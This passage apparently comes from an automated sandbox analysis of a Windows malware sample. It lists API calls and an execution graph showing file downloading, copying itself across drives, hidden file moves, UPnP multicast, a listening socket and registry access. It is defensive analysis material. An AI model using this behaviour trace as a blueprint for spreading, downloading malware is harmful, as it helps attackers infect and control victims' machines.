                                                                                  0x0040d3fa
                                                                                  0x0040d400
                                                                                  0x0040d412
                                                                                  0x0040d424
                                                                                  0x0040d429
                                                                                  0x0040d42c
                                                                                  0x0040d438
                                                                                  0x0040d40f
                                                                                  0x00000000
                                                                                  0x0040d40f
                                                                                  0x0040d43f
                                                                                  0x0040d450
                                                                                  0x0040d457
                                                                                  0x0040d46d
                                                                                  0x0040d473
                                                                                  0x0040d478
                                                                                  0x00000000
                                                                                  0x0040d478
                                                                                  0x00000000
                                                                                  0x0040d48c
                                                                                  0x0040d492

                                                                                  APIs
                                                                                  • CoInitializeEx.OLE32(00000000,00000002,?,?,?,0040686F), ref: 0040D3DA
                                                                                    • Part of subcall function 0040C930: socket.WS2_32(00000002,00000002,00000011), ref: 0040C94A
                                                                                    • Part of subcall function 0040C930: htons.WS2_32(0000076C), ref: 0040C980
                                                                                    • Part of subcall function 0040C930: inet_addr.WS2_32(239.255.255.250), ref: 0040C98F
                                                                                    • Part of subcall function 0040C930: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040C9AD
                                                                                    • Part of subcall function 0040C930: bind.WS2_32(000000FF,?,00000010), ref: 0040C9E3
                                                                                    • Part of subcall function 0040C930: lstrlenA.KERNEL32(004105A0,00000000,?,00000010), ref: 0040C9FC
                                                                                    • Part of subcall function 0040C930: sendto.WS2_32(000000FF,004105A0,00000000), ref: 0040CA0B
                                                                                    • Part of subcall function 0040C930: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040CA25
                                                                                    • Part of subcall function 0040CFE0: SysFreeString.OLEAUT32(00000000), ref: 0040D0BB
                                                                                    • Part of subcall function 0040CFE0: SysFreeString.OLEAUT32(00000000), ref: 0040D0C5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                  • String ID: TCP$UDP
                                                                                  • API String ID: 1519345861-1097902612
                                                                                  • Opcode ID: ddc30d4bc63b944d249e95f6100ac757865db89eed3a7b623e3ea16a2adfc62d
                                                                                  • Instruction ID: 198a483ec780ca398c4dd107ec41d4ae9ae4b932ff6ccac9155d2369ff036123
                                                                                  • Opcode Fuzzy Hash: ddc30d4bc63b944d249e95f6100ac757865db89eed3a7b623e3ea16a2adfc62d
                                                                                  • Instruction Fuzzy Hash: 5A11B4B4D00208EBDB00EBE4D845FAE7774BB44304F10856AE511773C2D7796A58CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Execution Graph

                                                                                  Execution Coverage:0.2%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:1461
                                                                                  Total number of Limit Nodes:2
                                                                                  execution_graph 5052 40c240 5055 40df70 5052->5055 5054 40c261 5056 40df8f 5055->5056 5069 40e083 5055->5069 5057 408e60 __aligned_recalloc_base 7 API calls 5056->5057 5056->5069 5058 40dfb6 memcpy htons 5057->5058 5059 40e05c 5058->5059 5060 40e006 sendto 5058->5060 5061 408fb0 __aligned_recalloc_base 3 API calls 5059->5061 5062 40e025 InterlockedExchangeAdd 5060->5062 5063 40e058 5060->5063 5064 40e06b 5061->5064 5062->5060 5065 40e03b 5062->5065 5063->5059 5066 40e079 5063->5066 5064->5054 5068 408fb0 __aligned_recalloc_base 3 API calls 5065->5068 5067 408fb0 __aligned_recalloc_base 3 API calls 5066->5067 5067->5069 5070 40e04a 5068->5070 5069->5054 5070->5054 5071 40c2c0 5081 40e110 5071->5081 5073 40c2ce 5074 40c34d 5073->5074 5076 40c2e8 InterlockedExchangeAdd 5073->5076 5077 40c32c WaitForSingleObject 5073->5077 5093 409f60 EnterCriticalSection 5073->5093 5098 40a390 5073->5098 5076->5073 5076->5077 5077->5073 5078 40c345 5077->5078 5101 40e0a0 5078->5101 5082 408e40 7 API calls 5081->5082 5083 40e11b CreateEventA socket 5082->5083 5084 40e152 5083->5084 5085 40e157 5083->5085 5088 40e0a0 8 API calls 5084->5088 5086 40e1ba 5085->5086 5087 40e15d bind 5085->5087 5086->5073 5089 40e190 5087->5089 5090 40e19c CreateThread 5087->5090 5088->5085 5091 40e0a0 8 API calls 5089->5091 5090->5086 5092 40e195 5091->5092 5092->5073 5094 409f97 LeaveCriticalSection 5093->5094 5095 409f7f 5093->5095 5094->5073 5096 40ab90 3 API calls 5095->5096 5097 409f8a 5096->5097 5097->5094 5111 40a1a0 5098->5111 5102 40e0a4 5101->5102 5108 40e100 5101->5108 5103 40e0ac SetEvent WaitForSingleObject CloseHandle 5102->5103 5102->5108 5104 40e0d4 5103->5104 5110 40e0f0 5103->5110 5109 408fb0 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5104->5109 5104->5110 5106 40e0fa 5107 408fb0 __aligned_recalloc_base 3 API calls 5106->5107 5107->5108 5108->5074 5109->5104 5119 409940 shutdown closesocket 5110->5119 5112 40abd0 3 API calls 5111->5112 5113 40a1ab 5112->5113 5114 40a1c7 lstrlenA 5113->5114 5115 40ae60 7 API calls 5114->5115 5116 40a1fd 5115->5116 5117 40a228 5116->5117 5118 408fb0 __aligned_recalloc_base 3 API calls 5116->5118 5117->5073 5118->5117 5119->5106 5512 405800 5513 405867 5512->5513 5514 405811 5512->5514 5515 40d890 60 API calls 5513->5515 5518 405865 5513->5518 5517 405820 StrChrA 5514->5517 5514->5518 5522 40d890 GetTickCount srand ExpandEnvironmentStringsW 5514->5522 5515->5518 5516 408fb0 __aligned_recalloc_base 3 API calls 5519 405892 5516->5519 5517->5514 5518->5516 5523 40d8de 5522->5523 5523->5523 5524 40d8fc mbstowcs rand rand wsprintfW InternetOpenW 5523->5524 5525 40db00 InternetCloseHandle Sleep 5524->5525 5526 40d995 InternetOpenUrlW 5524->5526 5529 40584f Sleep 5525->5529 5530 40db27 6 API calls 5525->5530 5527 40daf3 InternetCloseHandle 5526->5527 5528 40d9c4 CreateFileW 5526->5528 5527->5525 5531 40d9f3 InternetReadFile 5528->5531 5532 40dae6 CloseHandle 5528->5532 5529->5514 5530->5529 5533 40dba9 wsprintfW DeleteFileW Sleep 5530->5533 5534 40da46 CloseHandle wsprintfW DeleteFileW Sleep 5531->5534 5535 40da17 5531->5535 5532->5527 5536 40d580 20 API calls 5533->5536 5552 40d580 CreateFileW 5534->5552 5535->5534 5537 40da20 WriteFile 5535->5537 5539 40dbe9 5536->5539 5537->5531 5541 40dbf3 Sleep 5539->5541 5542 40dc27 DeleteFileW 5539->5542 5545 40d740 5 API calls 5541->5545 5542->5529 5543 40dad9 DeleteFileW 5543->5532 5544 40da9d Sleep 5546 40d740 5 API calls 5544->5546 5547 40dc0a 5545->5547 5548 40dab4 5546->5548 5547->5529 5549 40dc1d ExitProcess 5547->5549 5550 40dad0 5548->5550 5551 40dac8 ExitProcess 5548->5551 5550->5532 5553 40d6d3 5552->5553 5554 40d5c7 CreateFileMappingW 5552->5554 5557 40d6d9 CreateFileW 5553->5557 5558 40d72a 5553->5558 5555 40d5e8 MapViewOfFile 5554->5555 5556 40d6c9 CloseHandle 5554->5556 5559 40d607 GetFileSize 5555->5559 5560 40d6bf CloseHandle 5555->5560 5556->5553 5561 40d721 5557->5561 5562 40d6fb WriteFile CloseHandle 5557->5562 5558->5543 5558->5544 5563 40d623 5559->5563 5564 40d6b5 UnmapViewOfFile 5559->5564 5560->5556 5565 408fb0 __aligned_recalloc_base 3 API calls 5561->5565 5562->5561 5572 40b4c0 5563->5572 5564->5560 5565->5558 5568 40ae60 7 API calls 5569 40d66e 5568->5569 5569->5564 5570 408fb0 __aligned_recalloc_base 3 API calls 5569->5570 5571 40d6ab 5570->5571 5571->5564 5573 40af50 10 API calls 5572->5573 5574 40b4e4 5573->5574 5574->5564 5574->5568 5575 404000 5576 404009 memset GetModuleHandleW 5575->5576 5577 404042 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5576->5577 5577->5577 5578 404080 CreateWindowExW 5577->5578 5579 4040ab 5578->5579 5580 4040ad GetMessageA 5578->5580 5581 4040df ExitThread 5579->5581 5582 4040c1 TranslateMessage DispatchMessageA 5580->5582 5583 4040d7 5580->5583 5582->5580 5583->5576 5583->5581 5584 405900 5585 405969 Sleep 5584->5585 5586 405980 5585->5586 5587 405a00 Sleep 5586->5587 5588 405998 Sleep wsprintfA 5586->5588 5590 40d890 60 API calls 5586->5590 5587->5585 5591 40d7f0 InternetOpenA 5588->5591 5590->5586 5592 40d816 InternetOpenUrlA 5591->5592 5593 40d888 5591->5593 5594 40d835 HttpQueryInfoA 5592->5594 5595 40d87e InternetCloseHandle 5592->5595 5593->5586 5596 40d874 InternetCloseHandle 5594->5596 5597 40d85e 5594->5597 5595->5593 5596->5595 5597->5596 5598 40bd00 5599 40bd17 5598->5599 5613 40bd6e 5598->5613 5600 40bd21 5599->5600 5601 40bd73 5599->5601 5602 40bdbd 5599->5602 5599->5613 5603 408e40 7 API calls 5600->5603 5605 40bd98 5601->5605 5606 40bd8b InterlockedDecrement 5601->5606 5631 40a890 5602->5631 5607 40bd2e 5603->5607 5608 408fb0 __aligned_recalloc_base 3 API calls 5605->5608 5606->5605 5620 40e440 5607->5620 5610 40bda4 5608->5610 5611 408fb0 __aligned_recalloc_base 3 API calls 5610->5611 5611->5613 5616 40bd5b InterlockedIncrement 5616->5613 5617 40a4f0 115 API calls 5618 40bde3 5617->5618 5618->5613 5618->5617 5636 40a990 5618->5636 5621 40e444 5620->5621 5622 40bd40 5620->5622 5621->5622 5623 40e455 InterlockedIncrement 5621->5623 5624 409c30 5622->5624 5623->5622 5625 409ab0 2 API calls 5624->5625 5626 409c3f 5625->5626 5627 409c49 5626->5627 5628 409c4d EnterCriticalSection 5626->5628 5627->5613 5627->5616 5629 409c6c LeaveCriticalSection 5628->5629 5629->5627 5632 40a8a3 5631->5632 5633 40a8cd memcpy 5631->5633 5634 408ea0 9 API calls 5632->5634 5633->5618 5635 40a8c4 5634->5635 5635->5633 5637 40a9b9 5636->5637 5638 40a9ae 5636->5638 5637->5638 5639 40a9d1 memmove 5637->5639 5638->5618 5639->5638 5640 405106 5648 4050e8 5640->5648 5641 405228 Sleep 5641->5648 5642 405119 5659 404860 5642->5659 5645 405238 ExitThread 5646 405150 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5650 4051c6 wsprintfW 5646->5650 5651 4051db wsprintfW 5646->5651 5648->5641 5648->5642 5648->5645 5653 4048c0 GetLogicalDrives 5648->5653 5649 40514b 5650->5651 5665 404bd0 _chkstk 5651->5665 5656 4048ed 5653->5656 5654 404966 5654->5648 5655 4048fc RegOpenKeyExW 5655->5656 5657 40491e RegQueryValueExW 5655->5657 5656->5654 5656->5655 5658 40495a RegCloseKey 5656->5658 5657->5656 5657->5658 5658->5656 5660 4048b9 5659->5660 5661 40487c 5659->5661 5660->5646 5660->5649 5700 4047e0 GetDriveTypeW 5661->5700 5664 4048ab lstrcpyW 5664->5660 5666 404be7 5665->5666 5667 404bee 6 API calls 5665->5667 5666->5649 5668 404ca2 5667->5668 5669 404ce4 PathFileExistsW 5667->5669 5705 40d530 CreateFileW 5668->5705 5671 404d60 PathFileExistsW 5669->5671 5672 404cf5 PathFileExistsW 5669->5672 5676 404d71 5671->5676 5677 404db6 FindFirstFileW 5671->5677 5674 404d06 CreateDirectoryW 5672->5674 5675 404d28 PathFileExistsW 5672->5675 5674->5675 5679 404d19 SetFileAttributesW 5674->5679 5675->5671 5680 404d39 CopyFileW 5675->5680 5681 404d91 5676->5681 5682 404d79 5676->5682 5677->5666 5693 404ddd 5677->5693 5678 404cc5 SetFileAttributesW DeleteFileW 5678->5669 5679->5675 5680->5671 5685 404d51 SetFileAttributesW 5680->5685 5683 404980 3 API calls 5681->5683 5708 404980 CoInitialize CoCreateInstance 5682->5708 5687 404d8c SetFileAttributesW 5683->5687 5684 404e9f lstrcmpW 5688 404eb5 lstrcmpW 5684->5688 5684->5693 5685->5671 5687->5677 5688->5693 5690 405076 FindNextFileW 5690->5684 5691 405092 FindClose 5690->5691 5691->5666 5692 404efb lstrcmpiW 5692->5693 5693->5684 5693->5690 5693->5692 5694 404f62 PathMatchSpecW 5693->5694 5695 404fe0 PathFileExistsW 5693->5695 5699 404a90 11 API calls 5693->5699 5694->5693 5696 404f83 wsprintfW SetFileAttributesW DeleteFileW 5694->5696 5695->5693 5697 404ff6 wsprintfW wsprintfW 5695->5697 5696->5693 5697->5693 5698 405060 MoveFileExW 5697->5698 5698->5690 5699->5693 5701 404808 5700->5701 5703 40481a 5700->5703 5702 40481c QueryDosDeviceW 5701->5702 5701->5703 5702->5703 5704 404836 StrCmpNW 5702->5704 5703->5660 5703->5664 5704->5703 5706 404cae 5705->5706 5707 40d55f GetFileSize CloseHandle 5705->5707 5706->5669 5706->5678 5707->5706 5709 4049b6 5708->5709 5711 4049f2 5708->5711 5710 4049c0 wsprintfW 5709->5710 5709->5711 5710->5711 5711->5687 5712 40f088 5713 40f090 5712->5713 5715 40f144 5713->5715 5718 40f2cd 5713->5718 5716 40f0c9 5716->5715 5722 40f1b8 RtlUnwind 5716->5722 5719 40f2e2 5718->5719 5721 40f2fe 5718->5721 5720 40f36d NtQueryVirtualMemory 5719->5720 5719->5721 5720->5721 5721->5716 5723 40f1d0 5722->5723 5723->5716 5120 404fcb 5133 404ecb 5120->5133 5121 404f62 PathMatchSpecW 5123 404f83 wsprintfW SetFileAttributesW DeleteFileW 5121->5123 5121->5133 5122 404fe0 PathFileExistsW 5125 404ff6 wsprintfW wsprintfW 5122->5125 5122->5133 5123->5133 5124 405076 FindNextFileW 5127 405092 FindClose 5124->5127 5128 404e9f lstrcmpW 5124->5128 5126 405060 MoveFileExW 5125->5126 5125->5133 5126->5124 5129 40509f 5127->5129 5130 404eb5 lstrcmpW 5128->5130 5128->5133 5130->5133 5132 404efb lstrcmpiW 5132->5133 5133->5121 5133->5122 5133->5124 5133->5132 5134 404a90 CreateDirectoryW wsprintfW FindFirstFileW 5133->5134 5135 404ae5 lstrcmpW 5134->5135 5136 404bbf 5134->5136 5137 404afb lstrcmpW 5135->5137 5141 404b11 5135->5141 5136->5133 5138 404b13 wsprintfW wsprintfW 5137->5138 5137->5141 5140 404b76 MoveFileExW 5138->5140 5138->5141 5139 404b8c FindNextFileW 5139->5135 5142 404ba8 FindClose RemoveDirectoryW 5139->5142 5140->5139 5141->5139 5142->5136 5724 40908e 5725 408fb0 __aligned_recalloc_base 3 API calls 5724->5725 5728 40904d 5725->5728 5726 409062 5727 408e60 __aligned_recalloc_base 7 API calls 5727->5728 5728->5726 5728->5727 5729 409064 memcpy 5728->5729 5729->5728 5283 40be50 5289 40f030 5283->5289 5286 40be90 5287 40be77 WaitForSingleObject 5293 40e480 5287->5293 5290 40f037 5289->5290 5292 40be66 5289->5292 5290->5292 5314 40eea0 5290->5314 5292->5286 5292->5287 5294 40e488 5293->5294 5313 40e5b2 5293->5313 5295 40e494 EnterCriticalSection 5294->5295 5294->5313 5296 40e530 LeaveCriticalSection SetEvent 5295->5296 5299 40e4ab 5295->5299 5297 40e563 5296->5297 5298 40e54b 5296->5298 5341 40c040 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 5297->5341 5300 40e551 PostQueuedCompletionStatus 5298->5300 5299->5296 5302 40e4bc InterlockedDecrement 5299->5302 5304 40e4d5 InterlockedExchangeAdd 5299->5304 5310 40e51b InterlockedDecrement 5299->5310 5300->5297 5300->5300 5302->5299 5303 40e56e 5350 40c180 5303->5350 5304->5299 5306 40e4e8 InterlockedIncrement 5304->5306 5335 40ead0 WSARecv 5306->5335 5310->5299 5311 40e59f DeleteCriticalSection 5312 408fb0 __aligned_recalloc_base 3 API calls 5311->5312 5312->5313 5313->5286 5315 408e40 7 API calls 5314->5315 5316 40eeab 5315->5316 5317 40eeb8 GetSystemInfo InitializeCriticalSection CreateEventA 5316->5317 5323 40f024 5316->5323 5318 40eef6 CreateIoCompletionPort 5317->5318 5319 40f01f 5317->5319 5318->5319 5320 40ef0f 5318->5320 5321 40e480 36 API calls 5319->5321 5322 40bea0 8 API calls 5320->5322 5321->5323 5324 40ef14 5322->5324 5323->5292 5324->5319 5325 40ef1f WSASocketA 5324->5325 5325->5319 5326 40ef3d setsockopt htons bind 5325->5326 5326->5319 5327 40efa6 listen 5326->5327 5327->5319 5328 40efba WSACreateEvent 5327->5328 5328->5319 5329 40efc7 WSAEventSelect 5328->5329 5329->5319 5333 40efd9 5329->5333 5330 40efff 5332 40bf50 17 API calls 5330->5332 5331 40bf50 17 API calls 5331->5333 5334 40f014 5332->5334 5333->5330 5333->5331 5334->5292 5336 40eb52 5335->5336 5337 40eb0e 5335->5337 5336->5299 5338 40eb10 WSAGetLastError 5337->5338 5339 40eb24 Sleep WSARecv 5337->5339 5340 40eb5b 5337->5340 5338->5336 5338->5337 5339->5336 5339->5338 5340->5299 5342 40c076 InterlockedExchangeAdd 5341->5342 5343 40c159 GetCurrentThread SetThreadPriority 5341->5343 5342->5343 5346 40c090 5342->5346 5343->5303 5344 40c0a9 EnterCriticalSection 5344->5346 5345 40c117 LeaveCriticalSection 5345->5346 5348 40c12e 5345->5348 5346->5343 5346->5344 5346->5345 5347 40c0f3 WaitForSingleObject 5346->5347 5346->5348 5349 40c14c Sleep 5346->5349 5347->5346 5348->5343 5349->5346 5351 40c202 CloseHandle CloseHandle WSACloseEvent 5350->5351 5352 40c18c EnterCriticalSection 5350->5352 5359 409940 shutdown closesocket 5351->5359 5353 40c1a8 5352->5353 5354 40c1d0 LeaveCriticalSection DeleteCriticalSection 5353->5354 5355 40c1bb CloseHandle 5353->5355 5356 408fb0 __aligned_recalloc_base 3 API calls 5354->5356 5355->5353 5357 40c1f6 5356->5357 5358 408fb0 __aligned_recalloc_base 3 API calls 5357->5358 5358->5351 5359->5311 5143 40bc50 5145 40bc54 5143->5145 5144 409f60 5 API calls 5144->5145 5145->5144 5146 40bc70 WaitForSingleObject 5145->5146 5148 40bc95 5145->5148 5149 40bab0 InterlockedExchangeAdd 5145->5149 5146->5145 5146->5148 5150 40bacd 5149->5150 5161 40bac6 5149->5161 5166 40b9c0 5150->5166 5153 40baed InterlockedIncrement 5163 40baf7 5153->5163 5154 40a390 13 API calls 5154->5163 5155 40bb20 5173 409820 inet_ntoa 5155->5173 5157 40bb2c 5158 40bbf0 InterlockedDecrement 5157->5158 5188 409940 shutdown closesocket 5158->5188 5159 40b8f0 6 API calls 5159->5163 5161->5145 5162 408e60 __aligned_recalloc_base 7 API calls 5162->5163 5163->5154 5163->5155 5163->5158 5163->5159 5163->5162 5165 408fb0 __aligned_recalloc_base 3 API calls 5163->5165 5174 40a4f0 5163->5174 5165->5163 5167 40b9cd socket 5166->5167 5168 40b9e2 htons connect 5167->5168 5169 40ba3f 5167->5169 5168->5169 5171 40ba2a 5168->5171 5169->5167 5170 40ba33 5169->5170 5170->5153 5170->5161 5189 409940 shutdown closesocket 5171->5189 5173->5157 5184 40a501 5174->5184 5177 408fb0 __aligned_recalloc_base 3 API calls 5178 40a884 5177->5178 5178->5163 5179 40a51f 5179->5177 5180 40a240 20 API calls 5180->5184 5183 40a390 13 API calls 5183->5184 5184->5179 5184->5180 5184->5183 5185 409f40 25 API calls 5184->5185 5190 40a410 5184->5190 5197 409fb0 EnterCriticalSection 5184->5197 5202 405430 5184->5202 5207 405470 5184->5207 5212 405340 5184->5212 5219 4053a0 5184->5219 5185->5184 5188->5161 5189->5170 5191 40a421 lstrlenA 5190->5191 5192 40ae60 7 API calls 5191->5192 5194 40a43f 5192->5194 5193 40a4cf 5193->5184 5194->5191 5196 40a44b 5194->5196 5195 408fb0 __aligned_recalloc_base 3 API calls 5195->5193 5196->5193 5196->5195 5198 409fc8 5197->5198 5199 40a004 LeaveCriticalSection 5198->5199 5222 40c210 NtQuerySystemTime RtlTimeToSecondsSince1980 5198->5222 5199->5184 5201 409ff3 5201->5199 5223 4053d0 5202->5223 5205 405469 5205->5184 5206 40bf50 17 API calls 5206->5205 5208 4053d0 65 API calls 5207->5208 5209 40548f 5208->5209 5210 4054bc 5209->5210 5233 4052f0 5209->5233 5210->5184 5236 4044c0 EnterCriticalSection 5212->5236 5214 40538d 5214->5184 5215 40535a 5215->5214 5241 405250 5215->5241 5218 408fb0 __aligned_recalloc_base 3 API calls 5218->5214 5248 404580 EnterCriticalSection 5219->5248 5221 4053c2 5221->5184 5222->5201 5226 4053e3 5223->5226 5224 405420 5224->5205 5224->5206 5226->5224 5227 4043d0 EnterCriticalSection 5226->5227 5228 40b4f0 63 API calls 5227->5228 5230 4043f0 5228->5230 5229 40449e LeaveCriticalSection 5229->5226 5230->5229 5231 408fb0 __aligned_recalloc_base 3 API calls 5230->5231 5232 40449b 5231->5232 5232->5229 5234 40a1a0 13 API calls 5233->5234 5235 405335 5234->5235 5235->5210 5238 4044de 5236->5238 5237 40456a LeaveCriticalSection 5237->5215 5238->5237 5239 409020 8 API calls 5238->5239 5240 40453c 5239->5240 5240->5237 5242 408e60 __aligned_recalloc_base 7 API calls 5241->5242 5243 405262 memcpy 5242->5243 5244 40a1a0 13 API calls 5243->5244 5245 4052cc 5244->5245 5246 408fb0 __aligned_recalloc_base 3 API calls 5245->5246 5247 4052db 5246->5247 5247->5218 5272 40b550 5248->5272 5251 4047be LeaveCriticalSection 5251->5221 5252 40b4f0 63 API calls 5254 4045bb 5252->5254 5253 4046d3 5255 4046fc 5253->5255 5256 4040f0 15 API calls 5253->5256 5254->5251 5254->5253 5258 408fb0 __aligned_recalloc_base 3 API calls 5254->5258 5257 408fb0 __aligned_recalloc_base 3 API calls 5255->5257 5256->5255 5259 40471d 5257->5259 5260 404632 5258->5260 5259->5251 5261 40472c CreateFileW 5259->5261 5262 409020 8 API calls 5260->5262 5261->5251 5263 40474f 5261->5263 5264 404642 5262->5264 5267 4047aa FlushFileBuffers CloseHandle 5263->5267 5268 40476c WriteFile 5263->5268 5265 408fb0 __aligned_recalloc_base 3 API calls 5264->5265 5266 404669 5265->5266 5269 40ae60 7 API calls 5266->5269 5267->5251 5268->5263 5270 4046a0 5269->5270 5271 4058a0 10 API calls 5270->5271 5271->5253 5275 40aaa0 5272->5275 5277 40aab3 5275->5277 5276 409020 8 API calls 5276->5277 5277->5276 5278 40aa00 62 API calls 5277->5278 5280 40aacd 5277->5280 5282 406920 61 API calls 5277->5282 5278->5277 5279 408fb0 __aligned_recalloc_base 3 API calls 5281 4045a4 5279->5281 5280->5279 5281->5251 5281->5252 5282->5277 5360 40edd0 GetQueuedCompletionStatus 5361 40ee12 5360->5361 5362 40ee88 5360->5362 5363 40ee17 WSAGetOverlappedResult 5361->5363 5367 40ebe0 5361->5367 5363->5361 5364 40ee39 WSAGetLastError 5363->5364 5364->5361 5366 40ee53 GetQueuedCompletionStatus 5366->5361 5366->5362 5368 40ed72 InterlockedDecrement setsockopt closesocket 5367->5368 5369 40ebf4 5367->5369 5370 40ecb9 5368->5370 5369->5368 5371 40ebfc 5369->5371 5370->5366 5387 40c210 NtQuerySystemTime RtlTimeToSecondsSince1980 5371->5387 5373 40ec01 InterlockedExchange 5374 40ec18 5373->5374 5375 40ecce 5373->5375 5374->5370 5378 40ec29 InterlockedDecrement 5374->5378 5379 40ec3c InterlockedDecrement InterlockedExchangeAdd 5374->5379 5376 40ece7 5375->5376 5377 40ecd7 InterlockedDecrement 5375->5377 5380 40ecf2 5376->5380 5381 40ed07 InterlockedDecrement 5376->5381 5377->5366 5378->5366 5382 40ecaf 5379->5382 5396 40e960 WSASend 5380->5396 5384 40ed69 5381->5384 5388 40eb70 5382->5388 5384->5366 5385 40ecfe 5385->5366 5387->5373 5389 40eb80 InterlockedExchangeAdd 5388->5389 5390 40eb7c 5388->5390 5391 40ebd3 5389->5391 5392 40eb97 InterlockedIncrement 5389->5392 5390->5370 5391->5370 5393 40ead0 4 API calls 5392->5393 5394 40ebc6 5393->5394 5394->5391 5395 40ebcc InterlockedDecrement 5394->5395 5395->5391 5397 40e9d0 5396->5397 5398 40e992 WSAGetLastError 5396->5398 5397->5385 5398->5397 5399 40e99f 5398->5399 5400 40e9d6 5399->5400 5401 40e9a6 Sleep WSASend 5399->5401 5400->5385 5401->5397 5401->5398 5730 40f090 5731 40f144 5730->5731 5732 40f0ae 5730->5732 5733 40f2cd NtQueryVirtualMemory 5732->5733 5735 40f0c9 5733->5735 5734 40f1b8 RtlUnwind 5734->5735 5735->5731 5735->5734 5736 40e290 5737 40e2a7 5736->5737 5743 40e320 5736->5743 5738 40e2b7 5737->5738 5739 40e2d5 EnterCriticalSection 5737->5739 5740 40e30c LeaveCriticalSection DeleteCriticalSection 5739->5740 5744 40e2ed 5739->5744 5741 408fb0 __aligned_recalloc_base 3 API calls 5740->5741 5741->5743 5742 408fb0 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5742->5744 5744->5742 5745 40e30b 5744->5745 5745->5740 5746 40b890 5751 40b830 5746->5751 5749 40b830 send 5750 40b8be 5749->5750 5752 40b841 send 5751->5752 5753 40b875 5752->5753 5754 40b85e 5752->5754 5753->5749 5753->5750 5754->5752 5754->5753 5755 40bc10 5756 409c30 4 API calls 5755->5756 5757 40bc23 5756->5757 5758 40bab0 129 API calls 5757->5758 5759 40bc3a 5757->5759 5758->5759 5760 405a10 ExitThread 5761 404490 5762 40442b 5761->5762 5763 408fb0 __aligned_recalloc_base 3 API calls 5762->5763 5764 40449b LeaveCriticalSection 5763->5764 5414 4046dc 5417 4045dc 5414->5417 5415 4046d3 5416 4046fc 5415->5416 5418 4040f0 15 API calls 5415->5418 5419 408fb0 __aligned_recalloc_base 3 API calls 5416->5419 5417->5415 5420 408fb0 __aligned_recalloc_base 3 API calls 5417->5420 5418->5416 5421 40471d 5419->5421 5422 404632 5420->5422 5423 40472c CreateFileW 5421->5423 5424 4047be LeaveCriticalSection 5421->5424 5425 409020 8 API calls 5422->5425 5423->5424 5426 40474f 5423->5426 5427 404642 5425->5427 5430 4047aa FlushFileBuffers CloseHandle 5426->5430 5431 40476c WriteFile 5426->5431 5428 408fb0 __aligned_recalloc_base 3 API calls 5427->5428 5429 404669 5428->5429 5432 40ae60 7 API calls 5429->5432 5430->5424 5431->5426 5433 4046a0 5432->5433 5434 4058a0 10 API calls 5433->5434 5434->5415 5766 40de1f 5767 40dde0 5766->5767 5768 40de4b memmove 5767->5768 5769 40de5e 5767->5769 5768->5767 4250 405a20 Sleep 4251 405a48 4250->4251 4252 405a5a FindWindowA 4251->4252 4253 4061df CreateMutexA GetLastError 4251->4253 4252->4251 4256 405a7a Sleep MoveFileA MoveFileA FindWindowA 4252->4256 4254 406201 ExitProcess 4253->4254 4255 406209 GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW 4253->4255 4265 406294 4255->4265 4257 405ac1 Sleep MoveFileA 4256->4257 4258 405adc Sleep 4256->4258 4257->4258 4259 405af3 4258->4259 4260 405b7a 9 API calls 4259->4260 4261 405b0e 8 API calls 4259->4261 4262 405c02 8 API calls 4260->4262 4263 405cf4 6 API calls 4260->4263 4261->4259 4268 405cdc InternetCloseHandle DeleteFileW 4262->4268 4292 405c7d 4262->4292 4269 405d79 7 API calls 4263->4269 4270 405fca 4263->4270 4264 406581 Sleep RegOpenKeyExA 4266 4065b2 8 API calls 4264->4266 4267 406698 RegOpenKeyExA 4264->4267 4265->4264 4334 40d4a0 GetLocaleInfoA 4265->4334 4266->4267 4272 4067a4 Sleep 4267->4272 4273 4066be 8 API calls 4267->4273 4268->4263 4274 405df3 MoveFileW MoveFileW InternetOpenUrlA 4269->4274 4275 405e9b InternetCloseHandle Sleep 4269->4275 4280 406055 PathFileExistsA 4270->4280 4281 405fec FindWindowA 4270->4281 4341 40b4a0 4272->4341 4273->4272 4284 405e83 InternetCloseHandle Sleep 4274->4284 4285 405e3c 6 API calls 4274->4285 4275->4270 4277 405ec0 ShowWindow DeleteFileW SetForegroundWindow Sleep InternetOpenA 4275->4277 4286 405f18 InternetOpenUrlA 4277->4286 4287 405fbd InternetCloseHandle 4277->4287 4278 406333 ExpandEnvironmentStringsW wsprintfW CopyFileW 4288 406460 Sleep wsprintfW CopyFileW 4278->4288 4289 406387 SetFileAttributesW RegOpenKeyExW 4278->4289 4279 40632b ExitProcess 4293 406064 10 API calls 4280->4293 4294 4060d7 FindWindowA 4280->4294 4281->4270 4290 406008 Sleep DeleteFileW MoveFileW Sleep Sleep 4281->4290 4283 405ca4 MoveFileW Sleep MoveFileA Sleep 4283->4292 4284->4275 4285->4284 4295 405f41 MoveFileW Sleep DeleteFileW 4286->4295 4296 405f67 7 API calls 4286->4296 4287->4270 4288->4264 4301 4064a8 SetFileAttributesW RegOpenKeyExW 4288->4301 4297 406441 4289->4297 4298 4063bc RegSetValueExW RegCloseKey 4289->4298 4290->4270 4292->4268 4292->4283 4293->4294 4302 4060f3 10 API calls 4294->4302 4303 40616c 4294->4303 4295->4296 4296->4287 4336 